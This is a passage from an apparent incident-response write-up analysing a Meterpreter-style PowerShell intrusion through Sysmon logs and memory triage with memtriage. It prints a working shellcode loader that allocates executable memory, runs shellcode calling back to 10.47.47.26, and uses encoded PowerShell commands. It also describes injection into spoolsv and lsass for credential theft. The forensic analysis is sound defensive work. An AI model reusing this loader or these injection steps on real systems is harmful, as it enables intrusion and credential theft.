}10,}00,}00,}68,}00,}00,}40,}00,}53,}68,}58,}a4,}53,}e5,}ff,}d5,}93,}53,}53,}89,}e7,}57,`

}68,}00,}20,}00,}00,}53,}56,}68,}12,}96,}89,}e2,}ff,}d5,}85,}c0,}74,}cd,}8b,}07,}01,}c3,`

}85,}c0,}75,}e5,}58,}c3,}5f,}e8,}7d,}ff,}ff,}ff,}31,}30,}2e,}34,}37,}2e,}34,}37,}2e,}32,`

}36,}00"

$Zu=Add-Type -pass -m $Ku -Name "UV" -names wXr

$Zu=$Zu.replace("wXr", "Wi"+"n"+"32Functions")

[byte[]]$TW = $TW.replace("}","QhEax").replace("QhEa", "0").Split(",")

$RN=0x1007

if ($TW.L -gt 0x1007)

{

$RN=$TW.L

}

$dV=$Zu::calloc(0x1007, 1)

[UInt64]$Tao = 0

for($vX=0; $vX -le($TW.Length-1); $vX++)

{

$Zu::memset([IntPtr]($dV.ToInt32()+$vX), $TW[$vX], 1)

}

$Zu::VirtualProtect($dV, 0x1007, 0x40, [Ref]$Tao)

$Zu::CreateThread(0,0x00,$dV,0,0,0)

As an investigator, we'll want to glean as much as we can as quickly as we can. Several things jump out to me. First and foremost the string of hexadecimal characters delimited by ,},  which is assigned to a variable named $TW. I take this to be shellcode, but it requires more time and effort to grok.

We see a variable named $Ku assigned a string that calls DllImport multiple times, referencing in order the calloc function in msvcrt.dll, the CreateThread and VirtualProtect functions in kernel32.dll and finally the memset function in msvcrt.dll.

Below the byte array we see a variable created called $Zu. $Zu is set to the result of a call to the Add-Type cmdlet, which is going to cause some just-in-time compilation, triggering the C# compiler, csc.exe and the C# linker, cvtres.exe. This JIT compilation will add the specified functionality to our PowerShell session that wouldn't otherwise be there, essentially allowing the PowerShell session to access C# functionality it may not normally have. In my experience, this compilation will create a dll on disk that may be useful to analysts, though I've not personally taken the time to examine one. Passing it to pefile may be insightful. After Add-Type completes, $Zu will be a RunTimeType object. The value of the variable $Ku from above is passed in as the MemberDefinition, the Name of the class created will be UV and the Namespace will be wXr.

Immediately following the designation of wXr as the Namespace, we see the replace() method called on the $Zu, but I think this will fail as RunTimeType objects have no replace() method.

Next we have some manipulations of the $TW variable. The curly brace is replaced by QhEax, and then the QhEa string is replaced by 0, leaving us with 0x in place of the curly brace and the string is split on the comma character resulting in an array of bytes assigned to $TW. Next up a variable named $RN is assigned the value 0x1007. Then $dv is assigned the return value from a call to $Zu's calloc() function, essentially a pointer to the allocated space in memory.

Next a for loop iterates over the $TW byte array elements, calling memset() and populating the previously allocated memory (note the use of the $dv pointer) with the bytes from $TW.

After populating the allocated memory, the VirtualProtect() function is called. Of note, the 0x40 value represents a memory protection constant of PAGE_EXECUTE_READWRITE.

And finally CreateThread() is called to execute the previously allocated code. Note this is not CreateRemoteThread(), which creates a new thread of execution in a remote process, this is creating a new thread in the current PowerShell process. We'll see the latter later.

So we have a rough outline of what this is doing, but we won't know the details unless we pick apart the byte array. If anyone wants to chime in on a reasonable process for that, I'm all ears. I've dabbled in reversing, but my knowledge in this area is not what I want it to be.

Back to Sysmon says

Recall our process before we took the detour to analyze our malicious PowerShells. Sysmon captured all of that. We left off reviewing events in the Sysmon log. Let's return to that. We saw PowerShell building an obfuscated set of variables that were going to be handed to another PowerShell instance as an encoded command, which we just spent some time picking apart. Sysmon picks up the execution of that PowerShell process as a child of the first PowerShell process, the grandchild of Excel.

Event ID:      1

Task Category: Process Create (rule: ProcessCreate)

Level:         Information

Keywords:      

User:          SYSTEM

Computer:      wins2012r202.1011Labs.com

Description:

Process Create:

RuleName: -

UtcTime: 2020-07-19 20:03:36.723

ProcessGuid: {fc3f293c-a718-5f14-a4dd-430000000000}

ProcessId: 1236

Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

FileVersion: 10.0.14409.1005 (rs1_srvoob.161208-1155)

Description: Windows PowerShell

Product: Microsoft® Windows® Operating System

Company: Microsoft Corporation

OriginalFileName: PowerShell.EXE

CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABpAHMAPQAnACQASwB1AD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyACIAKwAiAC4AIgArACIAZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcg...NgA0AFwAJABQAE0AJAB1AG0AXAB2ADEALgAwAFwAJAB1AG0AIgA7ACQASQB0AFgAIAA9ACAAJwBUAHIAIgArACIAdQAiACsAIgBlACcAOwBpAGYAKABbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBJAHMANgA0AEIAaQB0AE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACAALQBlAHEAIAAnACQASQB0AFgAJwApAHsAJAB1AG0APQAgACQAawBYAHQAfQA7ACQAdgBGAD0AIgAgACQAdQBtACAAUwB3AGYAWAAgACQAcQB6ACIAOwAkAHYARgA9ACQAdgBGAC4AcgBlAHAAbABhAGMAZQAoACIAUwB3AGYAWAAiACwAIAAiAC0AbgBvAGUAeABpAHQAIAAtAGUAIgApADsAaQBlAHgAIAAkAHYARgA=

CurrentDirectory: C:\Users\davehull\Documents\

User: 1011LABS\dave.hull

LogonGuid: {fc3f293c-4e60-5f14-ee7e-3b0000000000}

LogonId: 0x3B7EEE

TerminalSessionId: 1

IntegrityLevel: High

Hashes: MD5=38FD25D3D4AD1C28F741B1D4D50B2E6E,SHA256=2C2F1A21D85504374679D83D1BE9553D082AD9B28CBB847A90F04305A09882B9,IMPHASH=A4D32F1AEF525B8ADA6A26F28596AC2E

ParentProcessGuid: {fc3f293c-a716-5f14-06ce-430000000000}

ParentProcessId: 1604

ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

ParentCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  /w 1 /C "sv BvI -;sv AT ec;sv Al ((gv BvI).value.toString()+(gv AT).value.toString());powershell (gv Al).value.toString()...

Above I've redacted some portions to save space. Note the ParentCommandLine near the bottom was the one we reviewed previously, but the CommandLine shows plainly all that the attacker tried to hide or obfuscate to circumvent detection. The above PowerShell instance parents the third one, partially shown below.

Date:          7/19/2020 8:03:36 PM

Event ID:      1

Task Category: Process Create (rule: ProcessCreate)

Level:         Information

Keywords:      

User:          SYSTEM

Computer:      wins2012r202.1011Labs.com

Description:

Process Create:

RuleName: -

UtcTime: 2020-07-19 20:03:36.942

ProcessGuid: {fc3f293c-a718-5f14-49eb-430000000000}

ProcessId: 2752

Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

FileVersion: 10.0.14409.1005 (rs1_srvoob.161208-1155)

Description: Windows PowerShell

Product: Microsoft® Windows® Operating System

Company: Microsoft Corporation

OriginalFileName: PowerShell.EXE

CommandLine: "C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe" -noexit -e JABLAHUAPQAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGE...LAAgAFsAUgBlAGYAXQAkAFQAYQBvACkAOwAkAFoAdQA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAB4ADAAMAAsACQAZABWACwAMAAsADAALAAwACkAOwA=

CurrentDirectory: C:\Users\davehull\Documents\

User: 1011LABS\dave.hull

LogonGuid: {fc3f293c-4e60-5f14-ee7e-3b0000000000}

LogonId: 0x3B7EEE

TerminalSessionId: 1

IntegrityLevel: High

Hashes: MD5=38FD25D3D4AD1C28F741B1D4D50B2E6E,SHA256=2C2F1A21D85504374679D83D1BE9553D082AD9B28CBB847A90F04305A09882B9,IMPHASH=A4D32F1AEF525B8ADA6A26F28596AC2E

ParentProcessGuid: {fc3f293c-a718-5f14-a4dd-430000000000}

ParentProcessId: 1236

ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABpAHMAPQAnACQASwB1AD0AJw...

Again, I've redacted the encoded commands to save space, but we've already reviewed them in some detail, if not enough. Note the ProcessId 2752 is our third PowerShell instance.

Recall the discussion of the Add-Type cmdlet causing csc.exe and cvtres.exe to run. We can see that in the Sysmon logs.

Date:          7/19/2020 8:03:37 PM

Event ID:      1

Task Category: Process Create (rule: ProcessCreate)

Level:         Information

Keywords:      

User:          SYSTEM

Computer:      wins2012r202.1011Labs.com

Description:

Process Create:

RuleName: -

UtcTime: 2020-07-19 20:03:37.177

ProcessGuid: {fc3f293c-a719-5f14-1cf9-430000000000}

ProcessId: 44

Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

FileVersion: 4.8.3761.0 built by: NET48REL1

Description: Visual C# Command Line Compiler

Product: Microsoft® .NET Framework

Company: Microsoft Corporation

OriginalFileName: csc.exe

CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\davehull\AppData\Local\Temp\3m35xm2u\3m35xm2u.cmdline"

CurrentDirectory: C:\Users\davehull\Documents\

User: 1011LABS\dave.hull

LogonGuid: {fc3f293c-4e60-5f14-ee7e-3b0000000000}

LogonId: 0x3B7EEE

TerminalSessionId: 1

IntegrityLevel: High

Hashes: MD5=F8F36858B9405FBE27377FD7E8FEC2F2,SHA256=086C38FD66AEC0E824ECB74ECE3D7124174201A9B4F5C9974FCFDBAF04A5870E,IMPHASH=950FB6F62526333E663D35BA72D19DDC

ParentProcessGuid: {fc3f293c-a718-5f14-49eb-430000000000}

ParentProcessId: 2752

ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

ParentCommandLine: "C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe" -noexit -e JABLAHUAPQAnAFs...

Above we can see csc.exe as a child of the PowerShell process with PID of 2752. And next we see this csc.exe instance parenting cvtres.exe:

Date:          7/19/2020 8:03:37 PM

Event ID:      1

Task Category: Process Create (rule: ProcessCreate)

Level:         Information

Keywords:      

User:          SYSTEM

Computer:      wins2012r202.1011Labs.com

Description:

Process Create:

RuleName: -

UtcTime: 2020-07-19 20:03:37.442

ProcessGuid: {fc3f293c-a719-5f14-89fc-430000000000}

ProcessId: 2128

Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

FileVersion: 14.10.25028.0 built by: VCTOOLSD15RTM

Description: Microsoft® Resource File To COFF Object Conversion Utility

Product: Microsoft® .NET Framework

Company: Microsoft Corporation

OriginalFileName: CVTRES.EXE

CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\davehull\AppData\Local\Temp\RES2896.tmp" "c:\Users\davehull\AppData\Local\Temp\3m35xm2u\CSC81A6F4C3835645A8965DB621A6C573D8.TMP"

CurrentDirectory: C:\Users\davehull\Documents\

User: 1011LABS\dave.hull

LogonGuid: {fc3f293c-4e60-5f14-ee7e-3b0000000000}

LogonId: 0x3B7EEE

TerminalSessionId: 1

IntegrityLevel: High

Hashes: MD5=70D838A7DC5B359C3F938A71FAD77DB0,SHA256=E4DBDBF7888EA96F3F8AA5C4C7F2BCF6E57D724DD8194FE5F35B673C6EF724EA,IMPHASH=0FCE7AAB563778C495FB59AA62464473

ParentProcessGuid: {fc3f293c-a719-5f14-1cf9-430000000000}

ParentProcessId: 44

ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\davehull\AppData\Local\Temp\3m35xm2u\3m35xm2u.cmdline"

And here's the output, a dll created in the Temp directory:

Date:          7/19/2020 8:03:37 PM

Event ID:      11

Task Category: File created (rule: FileCreate)

Level:         Information

Keywords:      

User:          SYSTEM

Computer:      wins2012r202.1011Labs.com

Description:

File created:

RuleName: DLL

UtcTime: 2020-07-19 20:03:37.458

ProcessGuid: {fc3f293c-a719-5f14-1cf9-430000000000}

ProcessId: 44

Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

TargetFilename: C:\Users\davehull\AppData\Local\Temp\3m35xm2u\3m35xm2u.dll

CreationUtcTime: 2020-07-19 20:03:37.161

Next up, Sysmon shows:

Date:          7/19/2020 8:03:39 PM

Event ID:      3

Task Category: Network connection detected (rule: NetworkConnect)

Level:         Information

Keywords:      

User:          SYSTEM

Computer:      wins2012r202.1011Labs.com

Description:

Network connection detected:

RuleName: -

UtcTime: 2020-07-19 20:03:34.735

ProcessGuid: {fc3f293c-a718-5f14-49eb-430000000000}

ProcessId: 2752

Image: C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe

User: 1011LABS\dave.hull

Protocol: tcp

Initiated: true

SourceIsIpv6: false

SourceIp: 10.47.47.17

SourceHostname: wins2012r202.1011Labs.com

SourcePort: 53245

SourcePortName: -

DestinationIsIpv6: false

DestinationIp: 10.47.47.26

DestinationHostname: -

DestinationPort: 80

DestinationPortName: http

Perhaps our shellcode set up this reverse shell connecting to 10.47.47.26 via port 80?

And another, but the source port has incremented:

Date:          7/19/2020 8:03:39 PM

Event ID:      3

Task Category: Network connection detected (rule: NetworkConnect)

Level:         Information

Keywords:      

User:          SYSTEM

Computer:      wins2012r202.1011Labs.com

Description:

Network connection detected:

RuleName: -

UtcTime: 2020-07-19 20:03:35.259

ProcessGuid: {fc3f293c-a718-5f14-49eb-430000000000}

ProcessId: 2752

Image: C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe

User: 1011LABS\dave.hull

Protocol: tcp

Initiated: true

SourceIsIpv6: false

SourceIp: 10.47.47.17

SourceHostname: wins2012r202.1011Labs.com

SourcePort: 53246

SourcePortName: -

DestinationIsIpv6: false

DestinationIp: 10.47.47.26

DestinationHostname: -

DestinationPort: 80

DestinationPortName: http

Then a bit later we have a Registry value set event related to creation of a new service:

Date:          7/19/2020 8:04:17 PM

Event ID:      13

Task Category: Registry value set (rule: RegistryEvent)

Level:         Information

Keywords:      

User:          SYSTEM

Computer:      wins2012r202.1011Labs.com

Description:

Registry value set:

RuleName: T1031,T1050

EventType: SetValue

UtcTime: 2020-07-19 20:04:17.209

ProcessGuid: {fc3f293c-bb4e-5f13-9e5b-000000000000}

ProcessId: 468

Image: C:\Windows\system32\services.exe

TargetObject: HKLM\System\CurrentControlSet\Services\axfvos\Start

Details: DWORD (0x00000003)

Followed by another related Registry value set event:

Date:          7/19/2020 8:04:17 PM

Event ID:      13

Task Category: Registry value set (rule: RegistryEvent)

Level:         Information

Keywords:      

User:          SYSTEM

Computer:      wins2012r202.1011Labs.com

Description:

Registry value set:

RuleName: T1031,T1050

EventType: SetValue

UtcTime: 2020-07-19 20:04:17.209

ProcessGuid: {fc3f293c-bb4e-5f13-9e5b-000000000000}

ProcessId: 468

Image: C:\Windows\system32\services.exe

TargetObject: HKLM\System\CurrentControlSet\Services\axfvos\ImagePath

Details: cmd.exe /c echo axfvos > \\.\pipe\axfvos

And a blink later, a related process creation event:

Date:          7/19/2020 8:04:17 PM

Event ID:      1

Task Category: Process Create (rule: ProcessCreate)

Level:         Information

Keywords:      

User:          SYSTEM

Computer:      wins2012r202.1011Labs.com

Description:

Process Create:

RuleName: -

UtcTime: 2020-07-19 20:04:17.225

ProcessGuid: {fc3f293c-a741-5f14-920b-440000000000}

ProcessId: 1720

Image: C:\Windows\System32\cmd.exe

FileVersion: 6.2.9200.16384 (win8_rtm.120725-1247)

Description: Windows Command Processor

Product: Microsoft® Windows® Operating System

Company: Microsoft Corporation

OriginalFileName: Cmd.Exe

CommandLine: cmd.exe /c echo axfvos > \\.\pipe\axfvos

CurrentDirectory: C:\Windows\system32\

User: NT AUTHORITY\SYSTEM

LogonGuid: {fc3f293c-bb4e-5f13-e703-000000000000}

LogonId: 0x3E7

TerminalSessionId: 0

IntegrityLevel: System

Hashes: MD5=BF93A2F9901E9B3DFCA8A7982F4A9868,SHA256=858A5766A2DE54A6908A2CA30DD5983790B8C63614A455292613B129877223E9,IMPHASH=B16908B0B9C28132BF70555413F2F045

ParentProcessGuid: {fc3f293c-bb4e-5f13-9e5b-000000000000}

ParentProcessId: 468

ParentImage: C:\Windows\System32\services.exe

ParentCommandLine: C:\Windows\system32\services.exe

A little searching online and you'll find references indicating this is probably related to Meterpreter's getsystem command.

Followed by another Registry set value event, probably cleaning up the service as it is no longer needed.

Date:          7/19/2020 8:04:17 PM

Event ID:      13

Task Category: Registry value set (rule: RegistryEvent)

Level:         Information

Keywords:      

User:          SYSTEM

Computer:      wins2012r202.1011Labs.com

Description:

Registry value set:

RuleName: T1031,T1050

EventType: SetValue

UtcTime: 2020-07-19 20:04:17.225

ProcessGuid: {fc3f293c-bb4e-5f13-9e5b-000000000000}

ProcessId: 468

Image: C:\Windows\system32\services.exe

TargetObject: HKLM\System\CurrentControlSet\Services\axfvos\Start

Details: DWORD (0x00000004)

And another outbound connection:

Date:          7/19/2020 8:04:18 PM

Event ID:      3

Task Category: Network connection detected (rule: NetworkConnect)

Level:         Information

Keywords:      

User:          SYSTEM

Computer:      wins2012r202.1011Labs.com

Description:

Network connection detected:

RuleName: -

UtcTime: 2020-07-19 20:04:14.249

ProcessGuid: {fc3f293c-a718-5f14-49eb-430000000000}

ProcessId: 2752

Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

User: 1011LABS\dave.hull

Protocol: tcp

Initiated: true

SourceIsIpv6: false

SourceIp: 10.47.47.17

SourceHostname: wins2012r202.1011Labs.com

SourcePort: 53247

SourcePortName: -

DestinationIsIpv6: false

DestinationIp: 10.47.47.26

DestinationHostname: -

DestinationPort: 80

DestinationPortName: http

And now for something completely different. Our PowerShell process calls CreateRemoteThread() against spoolsv.exe:

Date:          7/19/2020 8:04:30 PM

Event ID:      8

Task Category: CreateRemoteThread detected (rule: CreateRemoteThread)

Level:         Information

Keywords:      

User:          SYSTEM

Computer:      wins2012r202.1011Labs.com

Description:

CreateRemoteThread detected:

RuleName: -

UtcTime: 2020-07-19 20:04:30.116

SourceProcessGuid: {fc3f293c-a718-5f14-49eb-430000000000}

SourceProcessId: 2752

SourceImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

TargetProcessGuid: {fc3f293c-bb50-5f13-4008-010000000000}

TargetProcessId: 1120

TargetImage: C:\Windows\System32\spoolsv.exe

NewThreadId: 212

StartAddress: 0x0000000000DC0000

StartModule: -

StartFunction: -

Above we looked at PowerShell allocating memory in its own process, populating that memory with shell code and creating a thread of execution. This is similar, but CreateRemoteThread() is used for starting a new thread of execution in another process. You might wonder why this is even possible in Windows. Microsoft's Raymond Chen explains.

Date:          7/19/2020 8:05:04 PM

Event ID:      8

Task Category: CreateRemoteThread detected (rule: CreateRemoteThread)

Level:         Information

Keywords:      

User:          SYSTEM

Computer:      wins2012r202.1011Labs.com

Description:

CreateRemoteThread detected:

RuleName: -

UtcTime: 2020-07-19 20:05:04.992

SourceProcessGuid: {fc3f293c-bb50-5f13-4008-010000000000}

SourceProcessId: 1120

SourceImage: C:\Windows\System32\spoolsv.exe

TargetProcessGuid: {fc3f293c-bb4e-5f13-015e-000000000000}

TargetProcessId: 476

TargetImage: C:\Windows\System32\lsass.exe

NewThreadId: 1864

StartAddress: 0x000000A0FF660000

StartModule: -

StartFunction: -

And above we see that spoolsv.exe calls CreateRemoteThread() against lsass.exe, which is the Local Security Authority Subsystem Service and handles security policy enforcement, password changes, authentication, and the like. When attackers want to dump credentials on Windows, they often do so by attacking lsass.

There is other data that Sysmon could give us. If we were running it with Image Loads configured, which creates a ton of noise, it would show us what dlls are loaded into processes and when. If it were configured to do this on this endpoint, we would see a handful of dlls loaded into the spoolsv.exe process shortly after our third PowerShell process opened a new thread in the spooler service.

See More: Memtriage

We can see this using gleeda's memtriage in combination with supported Volatility plugins. For my investigation, I downloaded memtriage to the victim system and started with this command:

.\memtriage.exe --pid 1120 --output csv --plugins dlllist --outfile dlllist_1120.csv

To quickly review the output, I used PowerShell and created a variable that assigned each CSV to an object as follows:

$dlllist = Get-Content ./dlllist_1120.csv | ConvertFrom-Csv

And then I selected the specific properties from those objects as follows:

$dlllist | Select-Object -Property LoadTime,Path

LoadTime                     Path

--------                     ----

2020-07-19 03:17:36 UTC+0000 C:\Windows\System32\spoolsv.exe

2020-07-19 03:17:36 UTC+0000 C:\Windows\SYSTEM32\ntdll.dll

2020-07-19 03:17:36 UTC+0000 C:\Windows\system32\KERNEL32.DLL

2020-07-19 03:17:36 UTC+0000 C:\Windows\system32\KERNELBASE.dll

2020-07-19 03:17:36 UTC+0000 C:\Windows\system32\USER32.dll

2020-07-19 03:17:36 UTC+0000 C:\Windows\system32\msvcrt.dll

2020-07-19 03:17:36 UTC+0000 C:\Windows\SYSTEM32\sechost.dll

2020-07-19 03:17:36 UTC+0000 C:\Windows\system32\RPCRT4.dll

2020-07-19 03:17:36 UTC+0000 C:\Windows\System32\DNSAPI.dll

2020-07-19 03:17:36 UTC+0000 C:\Windows\SYSTEM32\powrprof.dll

2020-07-19 03:17:36 UTC+0000 C:\Windows\system32\GDI32.dll

2020-07-19 03:17:36 UTC+0000 C:\Windows\system32\WS2_32.dll

2020-07-19 03:17:36 UTC+0000 C:\Windows\system32\NSI.dll

2020-07-19 03:17:36 UTC+0000 C:\Windows\SYSTEM32\combase.dll

2020-07-19 03:17:36 UTC+0000 C:\Windows\System32\CRYPTBASE.dll

2020-07-19 03:17:36 UTC+0000 C:\Windows\System32\bcryptPrimitives.dll

2020-07-19 03:17:36 UTC+0000 C:\Windows\System32\sspicli.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\clusapi.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\cryptdll.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\SYSTEM32\advapi32.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\IPHLPAPI.DLL

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\WINNSI.DLL

2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\mswsock.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\rasadhlp.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\fwpuclnt.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\localspl.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\CRYPT32.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\srvcli.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\SYSTEM32\cfgmgr32.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\CRYPTSP.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\SPOOLSS.DLL

2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\WINTRUST.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\SETUPAPI.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\bcrypt.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\MSASN1.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\DEVOBJ.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\winspool.drv

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\PrintIsolationProxy.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\tcpmon.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\snmpapi.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\wsnmp32.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\usbmon.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\OLEAUT32.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\WSDMon.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\wsdapi.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\webservices.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\FirewallAPI.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\SYSTEM32\clbcatq.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\FunDisc.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\XmlLite.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\fdPnp.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\ATL.DLL

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\drvstore.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\spool\PRTPROCS\x64\winprint.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\USERENV.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\profapi.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\SYSTEM32\gpapi.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\VERSION.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\DSROLE.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\win32spl.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\SHLWAPI.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\DEVRTL.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\SPINF.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\rsaenh.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\WINSTA.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\cscapi.dll

2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\netutils.dll

2020-07-19 13:45:05 UTC+0000 C:\Windows\System32\WTSAPI32.dll

2020-07-19 20:04:32 UTC+0000 C:\Windows\system32\WININET.dll

2020-07-19 20:04:32 UTC+0000 C:\Windows\system32\iertutil.dll

2020-07-19 20:04:32 UTC+0000 C:\Windows\System32\WINHTTP.dll

2020-07-19 20:04:32 UTC+0000 C:\Windows\System32\dhcpcsvc6.DLL

2020-07-19 20:04:32 UTC+0000 C:\Windows\System32\dhcpcsvc.DLL

2020-07-19 20:04:32 UTC+0000 C:\Windows\System32\webio.dll

2020-07-19 20:04:36 UTC+0000 C:\Windows\system32\PSAPI.DLL

2020-07-19 20:04:36 UTC+0000 C:\Windows\System32\WINMM.dll

2020-07-19 20:04:36 UTC+0000 C:\Windows\System32\WINMMBASE.dll

2020-07-19 20:04:36 UTC+0000 C:\Windows\system32\ole32.dll

2020-07-19 20:04:36 UTC+0000 C:\Windows\System32\MPR.dll

2020-07-19 20:04:36 UTC+0000 C:\Windows\System32\NETAPI32.dll

2020-07-19 20:04:36 UTC+0000 C:\Windows\System32\wkscli.dll

Take note of the load times for most of these dlls. Most are loaded shortly after the process starts. There's one outlier, WTSAPI32.dll and then there's a cluster of dlls loaded right around the time of our incident, 2020-07-19 20:04:32 UTC.

But why are these dlls loaded? The PowerShell we saw showed a small bit of shellcode and doesn't Metasploit do reflective loading without writing to disk and without registering dlls in the process? The answer is, yes, for the Metasploit specific dlls, but those dlls import functions from other system dlls as the authors of Metasploit don't want to write everything from scratch. Those 13 late loading dlls could make for a useful detection -- perhaps Sysmon should have a setting to only log late loading dlls. They may not all be malicious like the one outlier above, but logging late loading dlls could reduce the noise of logging all dll loads.

Let's see if other memtriage plugins can shed more light on what's going on, starting with malfind, which can be used to look for injected code in process memory. Here's the command I ran against the spoolsv.exe process id, 1120:

.\memtriage.exe --pid 1120 --plugins malfind --output csv --outfile malfind.csv

The data in this CSV output file can again be easily converted to PowerShell objects and reviewed using something like this:

$malfind = Get-Content .\malfind.csv | ConvertFrom-Csv

PS> $malfind

Process    : spoolsv.exe

Pid        : 1120

Address    : 14417920

VadTag     : VadS

Protection : PAGE_EXECUTE_READWRITE

Flags      : PrivateMemory: 1

Data       : Protection: 6

Process    : spoolsv.exe

Pid        : 1120

Address    : 1033265020928

VadTag     : VadS

Protection : PAGE_EXECUTE_READWRITE

Flags      : PrivateMemory: 1

Data       : Protection: 6

Process    : spoolsv.exe

Pid        : 1120

Address    : 1033271443456

VadTag     : VadS

Protection : PAGE_EXECUTE_READWRITE

Flags      : PrivateMemory: 1

Data       : Protection: 6

Process    : spoolsv.exe

Pid        : 1120

Address    : 1033272295424

VadTag     : VadS

Protection : PAGE_EXECUTE_READWRITE

Flags      : PrivateMemory: 1

Data       : Protection: 6

Above, malfind's output. When called as above, malfind shows that there are four suspect memory regions in spoolsv.exe's process memory. I don't know the exact heuristic malfind uses, but it may be a combination of the Protection and Flags. The PrivateMemory flag means the memory region is not backed by a file on disk. Generally a dll loaded in a process would be backed by a dll on disk. The Protection setting of PAGE_EXECUTE_READWRITE is an artifact of the code being written into the memory region. These permissions can be updated after injection, in fact, Chris Truncer's Veil Framework explicitly calls this out and addresses it. This would be a fun future project for testing malfind, and maybe it's been done already.

The malfind plugin can do more, if run without CSV output, you'll get something like this:

.\memtriage.exe --pid 1120 --dumpdir .\malfind_dump --plugins malfind

 ********************Plugin: malfind********************

Process: spoolsv.exe, Pid: 1120

VadTag: VadS, Protection: PAGE_EXECUTE_READWRITE, Flags: PrivateMemory: 1, Protection: 6

